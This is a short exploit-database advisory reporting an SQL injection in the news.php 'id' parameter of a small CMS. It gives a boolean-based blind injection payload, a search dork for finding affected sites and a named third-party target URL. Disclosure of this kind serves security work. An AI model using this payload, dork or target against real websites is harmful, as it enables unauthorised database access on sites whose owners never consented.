Pharax cms Sql Injection vulnerability

2018.02.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title ; Pharax cms Sql Injection vulnerability [+] Date : 2018-02-24 [+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS [+] Vendor Homepage : http://pharax.com/ [+] Dork : intext:"Designed By Pharax" [+] Forum : irethicalhackers.com/forums [+] Tested On : windows 10 - kali linux 2.0 [+] Contact : https://telegram.me/WebServer [+] Description : [!] Pharax is a personal content management [+] Poc : [+] Security Level : [!] Medium [+] Exploitation Technique: [!] Remote [+] Request Method : [!] POST [+] Vulnerability Files : [!] news.php [+] web application technology: Apache [+] back-end DBMS: MySQL [+] Parameter: id (GET) [!] Type: boolean-based blind [!] Title: AND boolean-based blind - WHERE or HAVING clause [!] Payload: id=397 AND 1351=1351 [+] Target : [!] http://wagpa.ir/news.php?id=397 [+] Fix : [!] Restrict user input or replace bad characters [+] We Are : [+] 0P3N3R [+] Mehrdad_Ice [+] S0!HP


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top